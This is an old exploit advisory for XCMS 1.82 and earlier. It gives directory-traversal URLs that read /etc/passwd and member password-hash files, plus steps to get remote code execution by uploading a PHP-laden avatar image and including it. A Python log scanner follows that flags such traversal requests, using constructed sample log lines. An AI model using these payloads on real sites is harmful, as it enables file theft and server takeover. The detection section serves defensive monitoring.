# Title : XCMS <= 1.82 Remote Local File Inclusion Vulnerability
# Published : 2007-12-28
# Author : nexen


#  _ __   _____  _____ _ __
# | '_ \ / _ \ \/ / _ \ '_ \
# | | | |  __/>  <  __/ | | |
# |_| |_|\___/_/\_\___|_| |_|
# XCMS <= 1.82 LFI & RCE Xpl
# Nexen rocked this one ;)
# LFIs
http://127.0.0.1/xcms/index.php?pg=admin&s=../../../../../etc/passwd
http://127.0.0.1/xcms/index.php?mod=[existing module]&pg=../../../../../etc/passwd

# Hash disclosure
http://127.0.0.1/xcms/index.php?mod=[existing module]&pg=../../dati/membri/[username].dtb

# RCE:
RCE is more difficult: you need an image with PHP code embedded in it (you can use edjpgcom to do that).
Upload that image on your panel, then reach RCE through the LFI:

http://127.0.0.1/xcms/index.php?mod=[existing module]&pg=../../uploads/avatar/[your_username].jpg
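
A log check for the requests shown above, as an added example that is not part of the original advisory: it flags any `pg` or `s` value that is not a bare page name. The log lines, the `news` module and the `alice` user are constructed, and the rule that legitimate values contain only letters, digits, `_` and `-` is an assumption about XCMS.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

INCLUDE_PARAMS = ("pg", "s")   # parameters the advisory shows selecting a file
SAFE_VALUE = re.compile(r"[A-Za-z0-9_-]+")   # assumption: bare page names only
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=5):
    """Percent-decode until stable so nested encoding cannot hide a path."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(value):
    """Return why a value is not a bare page name, or None if it is one."""
    v = fully_decode(value).replace("\\", "/")
    if ".." in v.split("/"):
        return "directory traversal"
    if "/" in v:
        return "path separator"
    if not SAFE_VALUE.fullmatch(v):
        return "unexpected characters"
    return None

def scan(log_lines):
    """Return (line_no, param, reason) for each suspicious include parameter."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        # parse_qsl performs the first round of percent-decoding
        for key, value in parse_qsl(urlsplit(m.group(1)).query):
            reason = classify(value) if key in INCLUDE_PARAMS else None
            if reason:
                hits.append((n, key, reason))
    return hits

# Constructed sample lines in combined log format (not real traffic).
SAMPLE = [
    '10.0.0.5 - - [28/Dec/2007:10:00:00 +0000] "GET /xcms/index.php?pg=home HTTP/1.1" 200 512',
    '10.0.0.9 - - [28/Dec/2007:10:00:07 +0000] "GET /xcms/index.php?pg=admin&s=../../../../../etc/passwd HTTP/1.1" 200 1873',
    '10.0.0.9 - - [28/Dec/2007:10:00:09 +0000] "GET /xcms/index.php?mod=news&pg=..%2F..%2Fdati%2Fmembri%2Falice.dtb HTTP/1.1" 200 96',
    '10.0.0.5 - - [28/Dec/2007:10:00:12 +0000] "GET /xcms/index.php?mod=news&pg=articles HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

A 200 response on a flagged line, as in the constructed samples, is the case to triage first, since it means the server returned content for the request.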
